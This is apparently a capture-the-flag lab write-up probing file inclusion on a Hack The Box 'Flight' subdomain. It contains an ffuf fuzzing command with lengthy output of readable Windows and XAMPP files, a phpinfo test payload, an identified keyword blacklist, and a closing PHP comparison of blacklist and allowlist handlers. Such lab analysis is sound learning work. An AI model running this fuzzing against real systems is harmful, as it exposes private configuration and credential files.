school.flight.htb
The discovered virtual host / sub-domain appears to be hosting an aviation school within the organization
Content is just ipsum
The 3 buttons in the navigation bar appear rather interesting as they fetch and load resources via a parameter: view
Given that those 3 resources do exist, this seems to suggest the use of the PHP include function
LFI
LFI appears confirmed as the index.php file is executed twice
RFI
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ echo '<?php phpinfo(); ?>' > phpinfo.php
Testing for RFI
While the web application did fetch and load the remote resource from the Kali web server, it doesn’t seem to execute it
Blacklist
Additionally, I found that there is a list of blacklisted words.
The following blacklisted words have been identified;
..
\
filter
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ ffuf -c -w /usr/share/wordlists/auto_wordlists/wordlists/file_inclusion_windows.txt -u http://school.flight.htb/index.php?view=FUZZ -H 'Content-Type: application/x-www-form-urlencoded' -fr 'Suspicious Activity Blocked!' -fs 1102
________________________________________________
:: Method : GET
:: URL : http://school.flight.htb/index.php?view=FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/Auto_Wordlists/wordlists/file_inclusion_windows.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1102
:: Filter : Regexp: Suspicious Activity Blocked!
________________________________________________
%00/etc/shadow%00 [status: 500, Size: 639, Words: 73, Lines: 21, Duration: 185ms]
%00/etc/passwd%00 [status: 500, Size: 639, Words: 73, Lines: 21, Duration: 255ms]
c:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 90ms]
c:/WINDOWS/win.ini [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 91ms]
c:/Windows/win.ini [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 85ms]
c:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml [Status: 200, Size: 45670, Words: 8921, Lines: 700, Duration: 86ms]
c:/windows/system.ini [Status: 200, Size: 1321, Words: 148, Lines: 44, Duration: 87ms]
c:/windows/system32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 135ms]
c:/windows/windowsupdate.log [Status: 200, Size: 1378, Words: 173, Lines: 35, Duration: 90ms]
c:/windows/win.ini [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 91ms]
c:/xampp/apache/conf/httpd.conf [Status: 200, Size: 22337, Words: 2849, Lines: 597, Duration: 90ms]
c:/xampp/phpmyadmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 137ms]
c:/xampp/webdav/webdav.txt [Status: 200, Size: 1379, Words: 167, Lines: 39, Duration: 129ms]
c:/xampp/tomcat/conf/tomcat-users.xml [Status: 200, Size: 3914, Words: 591, Lines: 87, Duration: 132ms]
c:/xampp/sendmail/sendmail.ini [Status: 200, Size: 3198, Words: 431, Lines: 103, Duration: 139ms]
c:/windows/system32/inetsrv/config/schema/aspnet_schema.xml [Status: 200, Size: 45670, Words: 8921, Lines: 700, Duration: 86ms]
c:/windows/system32/license.rtf [Status: 200, Size: 62635, Words: 7856, Lines: 365, Duration: 89ms]
c:/windows/panther/setupinfo [Status: 200, Size: 249166, Words: 8732, Lines: 465, Duration: 88ms]
c:/windows/notepad.exe [Status: 200, Size: 255566, Words: 1590, Lines: 713, Duration: 93ms]
c:/xampp/php/php.ini [Status: 200, Size: 75093, Words: 9638, Lines: 2026, Duration: 159ms]
c:/WINDOWS/WindowsUpdate.log [Status: 200, Size: 1378, Words: 173, Lines: 35, Duration: 96ms]
c:/xampp/tomcat/conf/web.xml [Status: 200, Size: 177712, Words: 42818, Lines: 4762, Duration: 133ms]
c:/WINDOWS/system32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 93ms]
c:/WINDOWS/system32/drivers/etc/protocol [Status: 200, Size: 2460, Words: 588, Lines: 58, Duration: 89ms]
c:/WINDOWS/system32/drivers/etc/networks [Status: 200, Size: 1509, Words: 231, Lines: 47, Duration: 90ms]
c:/WINDOWS/system32/drivers/etc/lmhosts.sam [Status: 200, Size: 4785, Words: 771, Lines: 110, Duration: 90ms]
c:/WINDOWS/system32/drivers/etc/services [Status: 200, Size: 18737, Words: 8656, Lines: 318, Duration: 87ms]
c:/windows/explorer.exe [Status: 200, Size: 4385078, Words: 28703, Lines: 12751, Duration: 103ms]
c:/xampp/apache/logs/error.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 189ms]
c:/xampp/apache/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 371ms]
c:/programdata/microsoft/appv/setup/officeintegrator.ps1 [Status: 200, Size: 6070, Words: 1415, Lines: 173, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/easeofaccesssettings2013.xml [Status: 200, Size: 7051, Words: 846, Lines: 164, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftinternetexplorer2013.xml [Status: 200, Size: 4213, Words: 801, Lines: 129, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftinternetexplorer2013backup.xml [Status: 200, Size: 3641, Words: 580, Lines: 106, Duration: 90ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftlync2010.xml [Status: 200, Size: 5070, Words: 751, Lines: 140, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftlync2013win64.xml [Status: 200, Size: 3967, Words: 548, Lines: 105, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftlync2013win32.xml [Status: 200, Size: 3967, Words: 548, Lines: 105, Duration: 93ms]
c:/programdata/microsoft/identitycrl/int/wlidsvcconfig.xml [Status: 200, Size: 13848, Words: 252, Lines: 35, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftnotepad.xml [Status: 200, Size: 2059, Words: 255, Lines: 57, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013office365win32.xml [Status: 200, Size: 11698, Words: 2502, Lines: 368, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013backupwin64.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 92ms]
c:/programdata/microsoft/identitycrl/production/wlidsvcconfig.xml [Status: 200, Size: 13805, Words: 252, Lines: 35, Duration: 86ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2013cawin64.xml [Status: 200, Size: 2388, Words: 304, Lines: 63, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2013cawin32.xml [Status: 200, Size: 2388, Words: 304, Lines: 63, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013office365win64.xml [Status: 200, Size: 11698, Words: 2502, Lines: 368, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2016cawin64.xml [Status: 200, Size: 2391, Words: 308, Lines: 63, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftskypeforbusiness2016win64.xml [Status: 200, Size: 3993, Words: 550, Lines: 105, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftskypeforbusiness2016win32.xml [Status: 200, Size: 3993, Words: 550, Lines: 105, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2016cawin32.xml [Status: 200, Size: 2391, Words: 308, Lines: 63, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/networkprinters.xml [Status: 200, Size: 3245, Words: 360, Lines: 77, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/themesettings2013.xml [Status: 200, Size: 3708, Words: 430, Lines: 91, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftwordpad.xml [Status: 200, Size: 2107, Words: 256, Lines: 57, Duration: 95ms]
c:/programdata/microsoft/uev/inboxtemplates/roamingcredentialsettings.xml [Status: 200, Size: 4519, Words: 536, Lines: 102, Duration: 95ms]
c:/programdata/microsoft/uev/inboxtemplates/vdistate.xml [Status: 200, Size: 1994, Words: 251, Lines: 57, Duration: 99ms]
c:/programdata/microsoft/uev/scripts/registerinboxtemplates.ps1 [Status: 200, Size: 1713, Words: 205, Lines: 43, Duration: 94ms]
c:/programdata/microsoft/uev/inboxtemplates/desktopsettings2013.xml [Status: 200, Size: 19391, Words: 2202, Lines: 422, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013backupwin32.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016backupwin64.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016backupwin32.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2010win32.xml [Status: 200, Size: 73887, Words: 15476, Lines: 2027, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013win32.xml [Status: 200, Size: 69469, Words: 14521, Lines: 1895, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2010win64.xml [Status: 200, Size: 73887, Words: 15476, Lines: 2027, Duration: 94ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013win64.xml [Status: 200, Size: 69469, Words: 14521, Lines: 1895, Duration: 88ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016win64.xml [Status: 200, Size: 66836, Words: 13936, Lines: 1819, Duration: 88ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016win32.xml [Status: 200, Size: 66833, Words: 13934, Lines: 1819, Duration: 91ms]
c:/recovery/reagentold.xml [Status: 200, Size: 2142, Words: 221, Lines: 53, Duration: 92ms]
c:/windows/boot/bootdebuggerfiles.ini [Status: 200, Size: 1237, Words: 149, Lines: 38, Duration: 92ms]
c:/windows/diagnostics/index/appsdiagnostic.xml [Status: 200, Size: 2335, Words: 223, Lines: 55, Duration: 88ms]
[...REDACTED...]
c:/windows/speech_onecore/engines/tts/en-us/m1033eva.ini [Status: 200, Size: 2747, Words: 149, Lines: 121, Duration: 94ms]
c:/windows/speech_onecore/engines/tts/en-us/m1033david.ini [Status: 200, Size: 2014, Words: 158, Lines: 88, Duration: 95ms]
c:/windows/speech_onecore/engines/tts/en-us/m1033mark.ini [Status: 200, Size: 2336, Words: 149, Lines: 108, Duration: 92ms]
c:/windows/system.ini [Status: 200, Size: 1321, Words: 148, Lines: 44, Duration: 89ms]
c:/windows/speech_onecore/engines/tts/en-us/msttslocenus.ini [Status: 200, Size: 2488, Words: 144, Lines: 63, Duration: 90ms]
c:/windows/speech_onecore/engines/tts/en-us/m1033zira.ini [Status: 200, Size: 2461, Words: 147, Lines: 111, Duration: 93ms]
c:/windows/softwaredistribution/reportingevents.log [Status: 200, Size: 108426, Words: 2222, Lines: 208, Duration: 87ms]
c:/windows/system32/appraiser/appraiser_data.ini [Status: 200, Size: 147223, Words: 148, Lines: 5343, Duration: 93ms]
c:/windows/system32/appv/appvstreamingux.exe.config [Status: 200, Size: 1293, Words: 156, Lines: 36, Duration: 96ms]
c:/windows/system32/appxprovisioning.xml [Status: 200, Size: 4124, Words: 361, Lines: 78, Duration: 96ms]
c:/windows/system32/appraiser/appraiser_telemetryrunlist.xml [Status: 200, Size: 113899, Words: 3198, Lines: 1419, Duration: 97ms]
c:/windows/system32/ddfs/certificatestore_ddf.xml [Status: 200, Size: 75693, Words: 45506, Lines: 1673, Duration: 86ms]
c:/windows/system32/ddfs/enterprisemodernappmanagementddf.xml [Status: 200, Size: 30434, Words: 14590, Lines: 1112, Duration: 86ms]
c:/windows/system32/ddfs/ngcproddf_v1.2_final.xml [Status: 200, Size: 53708, Words: 21325, Lines: 1313, Duration: 91ms]
c:/windows/system32/ddfs/win32compatibilityappraiser_ddf.xml [Status: 200, Size: 21317, Words: 8276, Lines: 544, Duration: 97ms]
c:/windows/system32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 92ms]
c:/windows/system32/detailedreading-default.xml [Status: 200, Size: 5046, Words: 719, Lines: 189, Duration: 93ms]
c:/windows/microsoft.net/framework/v4.0.30319/aspnet_perf.ini [Status: 200, Size: 998600, Words: 31409, Lines: 8610, Duration: 103ms]
c:/windows/servicing/editions/editionmappings.xml [Status: 200, Size: 2438, Words: 147, Lines: 94, Duration: 715ms]
c:/windows/inf/setupapi.dev.log [Status: 200, Size: 1500631, Words: 350708, Lines: 20164, Duration: 104ms]
c:/windows/servicing/editions/editionmatrix.xml [Status: 200, Size: 6299, Words: 293, Lines: 89, Duration: 588ms]
c:/windows/system32/catroot2/dberr.txt [Status: 200, Size: 197201, Words: 21543, Lines: 2171, Duration: 95ms]
c:/windows/system32/ddfs/dmclient_ddf.xml [Status: 200, Size: 70436, Words: 34579, Lines: 1976, Duration: 90ms]
c:/windows/system32/f12/timeline.cpu.xml [Status: 200, Size: 4109, Words: 386, Lines: 73, Duration: 92ms]
c:/windows/system32/icsxml/cmnicfg.xml [Status: 200, Size: 6970, Words: 1189, Lines: 209, Duration: 92ms]
c:/windows/system32/ime/imejp/applets/imjpclst.xml [Status: 200, Size: 61185, Words: 552, Lines: 2597, Duration: 89ms]
c:/windows/system32/icsxml/potscfg.xml [Status: 200, Size: 3714, Words: 746, Lines: 113, Duration: 94ms]
c:/windows/system32/icsxml/osinfo.xml [Status: 200, Size: 1882, Words: 261, Lines: 77, Duration: 94ms]
c:/windows/system32/icsxml/ipcfg.xml [Status: 200, Size: 14553, Words: 2891, Lines: 404, Duration: 95ms]
c:/windows/system32/icsxml/pppcfg.xml [Status: 200, Size: 15536, Words: 3106, Lines: 435, Duration: 94ms]
c:/windows/softwaredistribution/datastore/logs/edbtmp.log [Status: 200, Size: 1311822, Words: 8953, Lines: 5226, Duration: 87ms]
c:/windows/system32/inetsrv/config/schema/aspnet_schema.xml [Status: 200, Size: 45670, Words: 8921, Lines: 700, Duration: 87ms]
c:/windows/system32/logfiles/setupcln/diagwrn.xml [Status: 200, Size: 31567, Words: 1088, Lines: 1021, Duration: 93ms]
c:/windows/system32/logfiles/setupcln/setupact.log [Status: 200, Size: 124586, Words: 33357, Lines: 1086, Duration: 94ms]
c:/windows/system32/logfiles/setupcln/setuperr.log [Status: 200, Size: 16769, Words: 3840, Lines: 143, Duration: 90ms]
c:/windows/system32/mmc.exe.config [Status: 200, Size: 4205, Words: 651, Lines: 75, Duration: 91ms]
c:/windows/system32/ndfeventview.xml [Status: 200, Size: 1667, Words: 153, Lines: 47, Duration: 86ms]
c:/windows/system32/nettrace.pla.diagnostics.xml [Status: 200, Size: 22758, Words: 3157, Lines: 494, Duration: 86ms]
c:/windows/system32/oemdefaultassociations.xml [Status: 200, Size: 6287, Words: 530, Lines: 85, Duration: 94ms]
c:/windows/system32/scavengespace.xml [Status: 200, Size: 11531, Words: 2349, Lines: 448, Duration: 98ms]
c:/windows/system32/slmgr/0409/slmgr.ini [Status: 200, Size: 48122, Words: 2043, Lines: 351, Duration: 98ms]
c:/windows/system32/recovery/reagent.xml [Status: 200, Size: 2207, Words: 221, Lines: 53, Duration: 97ms]
c:/windows/system32/logfiles/setupcln/diagerr.xml [Status: 200, Size: 66481, Words: 3776, Lines: 1133, Duration: 91ms]
c:/windows/system32/license.rtf [Status: 200, Size: 62635, Words: 7856, Lines: 365, Duration: 94ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_sr_en-us-n.xml [Status: 200, Size: 4370, Words: 596, Lines: 89, Duration: 99ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_voiceactivation_en-us.xml [Status: 200, Size: 2845, Words: 359, Lines: 57, Duration: 97ms]
c:/windows/system32/speech_onecore/common/tokens.xml [Status: 200, Size: 15139, Words: 2727, Lines: 130, Duration: 95ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_tts_en-us.xml [Status: 200, Size: 4362, Words: 516, Lines: 71, Duration: 100ms]
c:/windows/system32/spool/drivers/w32x86/3/unishare-pipelineconfig.xml [Status: 200, Size: 1155, Words: 147, Lines: 33, Duration: 95ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_tts_en-us_david.xml [Status: 200, Size: 2819, Words: 340, Lines: 53, Duration: 102ms]
c:/windows/system32/spool/drivers/x64/3/unishare-pipelineconfig.xml [Status: 200, Size: 1155, Words: 147, Lines: 33, Duration: 96ms]
c:/windows/servicing/editions/upgradematrix.xml [Status: 200, Size: 27662, Words: 1145, Lines: 261, Duration: 607ms]
c:/windows/pla/rules/rules.system.configuration.xml [Status: 200, Size: 288890, Words: 49759, Lines: 3902, Duration: 109ms]
c:/windows/system32/drivers/gmreadme.txt [Status: 200, Size: 1748, Words: 209, Lines: 45, Duration: 95ms]
c:/windows/system32/sysprep/actionfiles/specialize.xml [Status: 200, Size: 21319, Words: 619, Lines: 147, Duration: 94ms]
c:/windows/pla/rules/rules.system.diagnostics.xml [Status: 200, Size: 170127, Words: 33715, Lines: 2607, Duration: 110ms]
c:/windows/system32/sysprep/actionfiles/respecialize.xml [Status: 200, Size: 1518, Words: 153, Lines: 33, Duration: 95ms]
c:/windows/system32/sysprep/actionfiles/cleanup.xml [Status: 200, Size: 13661, Words: 440, Lines: 103, Duration: 96ms]
c:/windows/system32/sysprep/actionfiles/generalize.xml [Status: 200, Size: 32490, Words: 830, Lines: 225, Duration: 97ms]
c:/windows/system32/systemresetplatform/systemresetplugins.xml [Status: 200, Size: 1386, Words: 154, Lines: 36, Duration: 91ms]
c:/windows/system32/tcpbidi.xml [Status: 200, Size: 2775, Words: 557, Lines: 64, Duration: 91ms]
c:/windows/system32/uevappmonitor.exe.config [Status: 200, Size: 1248, Words: 157, Lines: 38, Duration: 100ms]
c:/windows/system32/wbem/xsl-mappings.xml [Status: 200, Size: 3968, Words: 190, Lines: 57, Duration: 95ms]
c:/windows/system32/windowspowershell/v1.0/examples/profile.ps1 [Status: 200, Size: 1563, Words: 217, Lines: 37, Duration: 103ms]
c:/windows/system32/wdsunattendtemplate.xml [Status: 200, Size: 1716, Words: 207, Lines: 42, Duration: 104ms]
c:/windows/system32/wimbootcompress.ini [Status: 200, Size: 3506, Words: 178, Lines: 110, Duration: 102ms]
c:/windows/system32/wpr.config.xml [Status: 200, Size: 1826, Words: 202, Lines: 42, Duration: 93ms]
c:/windows/system32/winrm/0409/winrm.ini [Status: 200, Size: 103616, Words: 3926, Lines: 727, Duration: 94ms]
c:/windows/system32/wsmanconfig_schema.xml [Status: 200, Size: 5777, Words: 1033, Lines: 99, Duration: 101ms]
c:/windows/microsoft.net/framework64/v4.0.30319/ngen.log [Status: 200, Size: 747432, Words: 58672, Lines: 3496, Duration: 97ms]
c:/windows/syswow64/appxprovisioning.xml [Status: 200, Size: 4124, Words: 361, Lines: 78, Duration: 86ms]
c:/windows/win.ini [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 105ms]
c:/windows/windowsupdate.log [Status: 200, Size: 1378, Words: 173, Lines: 35, Duration: 105ms]
c:/xampp/apache/conf/httpd.conf [Status: 200, Size: 22337, Words: 2849, Lines: 597, Duration: 120ms]
c:/windows/syswow64/winrm/0409/winrm.ini [Status: 200, Size: 103616, Words: 3926, Lines: 727, Duration: 91ms]
c:/windows/syswow64/windowspowershell/v1.0/modules/microsoft.powershell.odatautils/microsoft.powershell.odataadapter.ps1 [Status: 200, Size: 172202, Words: 20628, Lines: 2101, Duration: 87ms]
c:/xampp/phpMyAdmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 168ms]
c:/xampp/php/php.ini [Status: 200, Size: 75093, Words: 9638, Lines: 2026, Duration: 171ms]
c:/xampp/phpmyadmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 155ms]
c:/xampp/sendmail/sendmail.ini [Status: 200, Size: 3198, Words: 431, Lines: 103, Duration: 148ms]
c:/xampp/tomcat/conf/tomcat-users.xml [Status: 200, Size: 3914, Words: 591, Lines: 87, Duration: 133ms]
c:/xampp/webdav/webdav.txt [Status: 200, Size: 1379, Words: 167, Lines: 39, Duration: 126ms]
c:/xampp/tomcat/conf/web.xml [Status: 200, Size: 177712, Words: 42818, Lines: 4762, Duration: 126ms]
c:/windows/logs/dism/dism.log [Status: 200, Size: 3578351, Words: 641619, Lines: 17620, Duration: 98ms]
c:/windows/panther/setupact.log [Status: 200, Size: 4075332, Words: 715882, Lines: 22983, Duration: 109ms]
c:/windows/softwaredistribution/datastore/logs/edb.log [Status: 200, Size: 1311822, Words: 2907, Lines: 2071, Duration: 121ms]
c:/windows/security/database/edbtmp.log [Status: 200, Size: 1049678, Words: 1180, Lines: 678, Duration: 398ms]
c:/windows/servicing/sessions/sessions.back.xml [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
c:/windows/servicing/sessions/sessions.xml [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 127ms]
c:/xampp/apache/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 378ms]
c:/xampp/apache/logs/error.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 203ms]
:: Progress: [5489/5489] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:33] :: Errors: 0 ::
Fuzzing for LFI reveals a lot of files within the target system. The list was so long that the majority was redacted.
From here, I can learn that the web applications are hosted from Apache’s XAMPP, as suggested by the presence of the c:/xampp directory.
While the configuration files for XAMPP are dispersed under the /xampp directory, it’s heavily dependent on use cases.
I went through several files and nothing noteworthy was found.
Apache log
Checking the Apache log, I can learn that the web applications are hosted from the C:\xampp\htdocs directory
PHP file_get_contents
As I was unable to progress forward, I decided to look back at the LFI. Checking the source code reveals something critical.
I initially thought that LFI was confirmed as the index.php file appears to have loaded twice, but that wasn’t the case. Checking the source code of the LFI reveals the source code of the index.php file, which is not supposed to happen as it would have been just executed.
It reveals that it’s not actually the thought-to-be-confirmed LFI that loaded and executed the index.php file twice, but rather the conditional statement that loads the home page at c:\\xampp\htdocs\school.flight.htb\\home.html
There is no PHP include. Instead, the view parameter of the index.php file is using PHP’s file_get_contents to fetch (“include”) and load resources. This explains why PHP code is not being executed: it is being read as a string.
This concludes that PHP code execution is impossible. However, I haven’t tried the inclusion over SMB.
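The behaviour described above, sketched as an added example (not the application's actual source, which this page does not reproduce): a substring blacklist in front of file_get_contents, beside an allowlist-based version of the same handler. The function names, the page keys other than home.html, and the temporary files are assumptions constructed for the demo.

```php
<?php
declare(strict_types=1);

const BLOCK_MESSAGE = 'Suspicious Activity Blocked!';

// Assumed reconstruction of the observed behaviour: substring blacklist,
// then file_get_contents() on the raw parameter value.
function blacklist_view(string $view): string
{
    foreach (['..', '\\', 'filter'] as $word) {
        if (stripos($view, $word) !== false) {
            return BLOCK_MESSAGE;
        }
    }
    // Returns the file's bytes as a string; PHP tags inside are never executed.
    $data = @file_get_contents($view);
    return $data === false ? '' : $data;
}

// Hardened form: the parameter selects a key, never a path.
function allowlist_view(string $view, string $docroot): string
{
    // Hypothetical page keys; only home.html is named on the page.
    $pages = ['home' => 'home.html', 'about' => 'about.html', 'blog' => 'blog.html'];
    if (!isset($pages[$view])) {
        return BLOCK_MESSAGE;
    }
    $root = realpath($docroot);
    $path = realpath($docroot . '/' . $pages[$view]);
    // Defence in depth: the resolved file must sit directly under the docroot.
    if ($root === false || $path === false || dirname($path) !== $root) {
        return BLOCK_MESSAGE;
    }
    return (string) file_get_contents($path);
}

// --- Constructed demo data in a temporary directory ---
$base = str_replace('\\', '/', sys_get_temp_dir()) . '/view_demo_' . getmypid();
$docroot = $base . '/htdocs';
mkdir($docroot, 0700, true);
file_put_contents($docroot . '/home.html', '<h1>home</h1>');
file_put_contents($base . '/settings.ini', 'password=constructed'); // outside docroot
file_put_contents($base . '/phpinfo.php', '<?php phpinfo(); ?>');
chdir($docroot);

$cases = [
    'home.html'             => 'relative page',
    '../settings.ini'       => 'blacklisted traversal',
    $base . '/settings.ini' => 'absolute path, no blacklisted word',
    $base . '/phpinfo.php'  => 'PHP source read as a string',
];
foreach ($cases as $input => $label) {
    printf("%-36s blacklist: %s\n", $label, var_export(blacklist_view($input), true));
    printf("%-36s allowlist: %s\n", '', var_export(allowlist_view($input, $docroot), true));
}
printf("%-36s allowlist: %s\n", 'key "home"', var_export(allowlist_view('home', $docroot), true));

// Clean up the constructed files.
chdir(sys_get_temp_dir());
foreach ([$docroot . '/home.html', $base . '/settings.ini', $base . '/phpinfo.php'] as $f) {
    unlink($f);
}
rmdir($docroot);
rmdir($base);
```

Run with the PHP CLI. The blacklist version returns the contents of the absolute-path file and the literal PHP source, matching the fuzzing and RFI observations above, while the allowlist version serves only the mapped pages.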